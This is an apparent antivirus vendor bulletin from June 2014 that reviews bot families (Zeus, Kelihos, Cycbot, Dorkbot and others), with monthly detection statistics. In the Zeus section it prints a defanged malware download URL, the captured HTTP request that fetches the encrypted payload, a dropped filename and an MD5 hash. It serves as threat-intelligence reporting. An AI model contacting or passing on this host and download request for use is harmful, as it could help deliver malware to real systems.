Lavasoft Security Bulletin - June 2014: Bot Review
Bot Review
Table: Bots under analysis (June 2014, Lavasoft MAS).
Bot's name | May 2014 | June 2014 | Changes |
Zbot | 149 | 336 | 39.7% |
Cycbot | 19 | 34 | 3.2% |
Kelihos | 472 | 41 | -91.5% |
NrgBot/Dorkbot | 169 | 55 | -24.2% |
Blazebot/Rbot | 2 | 1 | -0.2% |
Shiz | 6 | 4 | -0.4% |
Total | 817 | 471 |
Bot distribution in June:
Kelihos. We saw a significant decrease of Kelihos backdoors discovered in the Lab from 58% in May to 9% in June here.
Cycbot. You can find the latest description of Cycbot here here.
Shiz. The latest example is here.
Zbot. This month the Zeus takes the lead with more than 70% of all bots. See the report in Malware Encyclopedia. 12% of all detected Zeus samples use Tor client.
Zeus continues downloading its files in an encrypted form:
URL | IP |
---|---|
hxxp://thepristinehorizon.com/images/0403UKc.elf | ![]() |
In this example it downloads file with extension .elf from the server in Atlanta, US (693594 bytes were transferred):
GET /images/0403UKc.elf HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: thepristinehorizon.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Jun 2014 08:30:31 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 04 Mar 2014 08:01:31 GMT
ETag: "440923-7e8ee-4f3c34fe95e48"
Accept-Ranges: bytes
Content-Length: 518382
Content-Type: text/plain
ZZP..MN/.fNa..N...~.?.N...cc..JZ...b..Qbz.N..;o.......&...n...)...NB..
...nb..n...n...n&..n..v*...Ch...b..v....,..M`.5.a...&..Le..J`...,[.A.
..Ne...J..Lm..I...I0..&c...2..Nb..Jb(.....]...Ob..Gb..Fb..>cB..R@.^
<<< skipped >>>
The copy of the trojan was placed into the temp folder with the following name (MD5: 1fe01bf0357e8f40244e87a521e319c7, 23 094 bytes in size):
%Temp%\opera_autoupdater.exe
NrgBot/Dorkbot. The number of Dorkbots has declined this month. You can find the latest description here. New samples keep the same malicious payload as the last month.
Blazebot/Rbot. The latest description is available in Malware Encyclopedia.
Read also:
Lavasoft Security Bulletin - June 2014: Top Threats.
Beware of FIFA World Cup 2014 Scams.
Share this post:

